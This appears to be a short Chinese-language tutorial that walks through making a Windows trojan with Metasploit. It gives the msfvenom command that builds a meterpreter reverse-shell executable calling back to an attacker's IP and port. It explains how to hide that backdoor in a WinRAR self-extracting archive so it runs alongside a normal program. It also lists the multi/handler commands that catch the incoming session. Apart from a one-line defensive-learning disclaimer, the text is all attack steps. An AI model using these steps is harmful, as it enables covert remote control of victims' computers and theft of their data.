前言

msf生成exe木马

本文仅用于网络信息防御学习

生成exe木马

<ip>:攻击者IP地址
<port>:攻击者端口号
<file>.exe:生成后的文件名

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > <file>.exe

为其他程序添加木马

  • 通过WinRAR创建自解压文件
  • 压缩格式选择rar或zip->勾选创建自解压格式压缩文件
  • 高级->自解压选项->在常规中设置解压路径c:\windows\temp->在设置中设置解压后运行c:\windows\temp\正常程序.exe->在设置中设置解压前运行c:\windows\temp\后门程序.exe->确定->确定

木马利用

攻击者

1
2
3
4
5
6
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport <port>
msf6 exploit(multi/handler) > run

受害者

  • 在Windows上运行木马可执行程序

完成

参考文献

哔哩哔哩——xiaodisec